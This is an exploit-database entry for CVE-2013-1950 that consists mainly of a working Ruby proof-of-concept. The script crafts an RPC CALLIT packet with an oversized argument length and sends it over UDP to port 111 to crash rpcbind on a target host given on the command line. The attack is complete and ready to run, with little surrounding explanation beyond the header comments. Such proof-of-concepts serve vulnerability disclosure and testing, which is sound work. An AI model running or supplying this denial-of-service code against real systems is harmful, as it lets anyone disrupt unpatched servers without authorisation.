rpcbind - CALLIT procedure UDP Crash (PoC)

Author: Sean Verity
type: dos
platform: linux
port: 
date_added: 2013-07-16  
date_updated: 2013-07-16  
verified: 0  
codes: CVE-2013-1950;OSVDB-95447  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 26887.rb  

#!/usr/bin/ruby
#
#	rpcbind_udp_crash_poc.rb
#	07/15/2013
#	Sean Verity <veritysr1980 [at] gmail.com>
#	CVE 2013-1950
#
#	rpcbind (CALLIT Procedure) UDP Crash PoC
#	Affected Software Package: rpcbind-0.2.0-19
#
#	Tested on:
#	Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
#	CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#	rpcbind can be crashed by setting the argument length
#	value > 8944 in an RPC CALLIT procedure request over UDP.
#

require 'socket'

def usage
	abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end

if ARGV.length == 1
	pkt = [rand(2**32)].pack('N')	# XID
	pkt << [0].pack('N')			# Message Type: CALL (0)
	pkt << [2].pack('N')			# RPC Version: 2
	pkt << [100000].pack('N')		# Program: Portmap (100000)
	pkt << [2].pack('N')			# Program Version: 2
	pkt << [5].pack('N')			# Procedure: CALLIT (5)
	pkt << [0].pack('N')			# Credentials Flavor: AUTH_NULL (0)
	pkt << [0].pack('N')			# Length: 0
	pkt << [0].pack('N')			# Credentials Verifier: AUTH_NULL (0)
	pkt << [0].pack('N')			# Length: 0
	pkt << [0].pack('N')			# Program: Unknown (0)
	pkt << [1].pack('N')			# Version: 1
	pkt << [1].pack('N')			# Procedure: 1
	pkt << [8945].pack('N')			# Argument Length
	pkt << "crash"					# Arguments

	s = UDPSocket.new
	s.send(pkt, 0, ARGV[0], 111)
else
	usage
end